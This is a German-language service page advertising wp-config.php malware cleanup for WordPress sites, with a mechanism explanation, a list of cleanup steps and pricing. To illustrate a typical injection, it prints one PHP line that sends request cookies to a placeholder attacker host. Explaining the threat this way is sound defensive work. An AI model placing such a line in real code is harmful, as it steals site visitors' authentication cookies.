threatover Patrik Grobshäuser

PHARMA-HACK · WORDPRESS · BEREINIGT

wp-config.php malware cleanup.

wp-config.php läuft bei jedem WordPress-Seitenaufruf — deshalb lieben Angreifer sie. Wir entfernen die Injektion, rotieren die Schlüssel und sagen Ihnen, worauf der Angreifer Zugriff hatte. Pauschal 279 $.

MECHANISMUS

wp-config.php ist der schlechteste Ort für Angreifer-Code.

wp-config.php wird bei jeder WordPress-Anfrage geladen, bevor WordPress selbst filtern kann. Wer diese Datei verändert, kann auf jeder Seite Code ausführen, jede Anmeldung mitschneiden oder versteckte Admins anlegen, die im Dashboard nicht erscheinen.

Sobald wp-config.php angefasst wurde, gelten Ihre Salts, das Datenbank-Passwort und die Authentifizierungsschlüssel als kompromittiert. Wir rotieren alles im Rahmen der Bereinigung — kein Upselling.

wp-config.php — typisches Injektionsmuster
01 02 // Legitimate wp-config starts with constants.
03 define('DB_NAME', 'wp_database');
04
05 // Injected — sends auth cookies to attacker on every request:
06 @file_get_contents("http://evil.example/c?d=" . $_COOKIE);

What I remove

Jede Zeile, jeder Schlüssel, jedes Konto.

  • PLUGIN-TRIAGE

    wp-config.php Zeile für Zeile mit einem sauberen Basiszustand verglichen. Jede nicht standardmäßige Zeile wird geprüft.

  • WP-CONFIG

    Eingeschleuster Code entfernt. Verirrte include/require-Zeilen, die auf unbekannte Dateien zeigen — geprüft und entfernt.

  • SCHLÜSSEL

    AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY und ihre Salts rotiert. Alle Sessions ungültig gemacht.

  • DATENBANK

    Versteckte Admin-Nutzer entfernt. Autoloaded wp_options-Payloads auf zugehörige Persistenz geprüft.

  • ABSICHERUNG

    Berechtigungen für wp-config.php verschärft. .htaccess- und Nginx-Regeln ergänzt, um direkten Zugriff zu verweigern.

  • BERICHT

    Forensischer Bericht in verständlicher Sprache: worauf der Angreifer Zugriff hatte, was rotiert wurde, was Sie noch tun müssen.

Preise

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Bereinigung starten

Monitoring

$29 / mo

per site, cancel any time

Laufendes Monitoring, Absicherung, eine Bereinigung pro Jahr inklusive.

Schützen lassen

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Alle Leistungen ansehen →

E-Mail [email protected] or use the contact form.